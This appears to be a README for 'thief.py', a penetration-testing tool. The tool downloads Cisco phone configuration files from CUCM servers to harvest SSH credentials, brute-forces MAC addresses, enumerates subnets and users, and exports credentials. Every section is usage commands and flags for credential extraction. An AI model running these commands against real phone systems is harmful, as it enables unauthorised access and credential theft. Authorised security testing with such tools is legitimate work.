Multi-threaded tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials. Features intelligent caching, automatic backoff protection, and MAC address brute forcing capabilities.
- Multi-threaded downloads: 40 parallel worker threads for fast credential extraction
- Intelligent caching: SQLite database prevents redundant TFTP requests
- Automatic protocol fallback: TFTP by default with automatic HTTP fallback
- TFTP server protection: Automatic backoff manager prevents server overload
- MAC address brute forcing: Try 4,096 MAC variations (3 hex characters) per detected phone
- Gowitness integration: Load phone targets directly from gowitness database
- CSV export: Export discovered credentials to CSV format
- User enumeration: Extract usernames via CUCM User Data Services (UDS) API
Download configs from CUCM server (will attempt to get list of all phones):
./thief.py -H <CUCM Server IP>Specify a phone IP address to detect CUCM and discover credentials:
./thief.py -p <Cisco Phone IP>Specify multiple phones (repeatable):
./thief.py -p 192.168.1.10 -p 192.168.1.11 -p 192.168.1.12Load phone targets from gowitness database:
./thief.py --gowitness /path/to/gowitness.sqlite3Brute force 4,096 MAC variations for each detected phone:
./thief.py -p <Phone IP> -b
./thief.py --gowitness <DB> -b -H <CUCM Server>Enumerate and attack entire subnet:
./thief.py --subnet 192.168.1.0/24Extract usernames via CUCM UDS API:
./thief.py -H <CUCM Server> --userenumView cached results:
./thief.py --show-db
./thief.py --show-db -H <CUCM Server> # Filter by CUCMForce re-download (bypass cache):
./thief.py -p <Phone IP> -b --forceUse custom database file:
./thief.py -p <Phone IP> --db custom.dbDisable database caching:
./thief.py -p <Phone IP> --no-dbExport to CSV:
./thief.py -p <Phone IP> -b --csv results.csv-H, --host: Specify CUCM server IP address-p, --phone: Specify Cisco phone IP (repeatable for multiple targets)--gowitness DB_FILE: Load phone targets from gowitness SQLite database-e, --enumsubnet: Enumerate and attack subnet in CIDR notation
-b, --brute-mac: Brute force MAC variations (4,096 combinations per phone)--force: Bypass cache and force re-download of all configuration files--userenum: Extract usernames via CUCM User Data Services (UDS) API
--csv FILENAME: Export discovered credentials to CSV file--outfile FILENAME: Specify output file for enumerated usernames (default: cucm_users.txt)
--db FILENAME: Specify SQLite database for caching results (default: thief.db)--no-db: Disable database caching and operate without persistent storage--show-db: Display summary of credentials stored in database and exit
-d, --debug: Enable verbose output including all failed attempts and TFTP operations
- Target Discovery: Detects phones via direct IP, gowitness database, or subnet enumeration
- CUCM Detection: Automatically identifies CUCM server from phone configuration
- MAC Detection: Extracts MAC addresses from phone hostnames (SEP format)
- Multi-threaded Brute Force: 40 workers simultaneously try TFTP/HTTP downloads
- Cache check: Skips previously attempted files
- Backoff protection: Automatically slows down if TFTP server shows errors
- Protocol fallback: Tries TFTP first, falls back to HTTP
- Credential Extraction: Parses XML configs for SSH credentials, passwords, usernames
- Database Storage: Caches all results to prevent redundant requests
uv sync
uv run thief --helpOr install as a global CLI tool:
uv tool install .
thief --helppip install .
thief --help- Multi-threading: 40 parallel workers process 4,096 MAC variations efficiently
- Intelligent caching: Database prevents re-downloading the same files
- Automatic throttling: Backoff manager protects TFTP server from overload
- Protocol optimization: TFTP (fast) with HTTP fallback (reliable)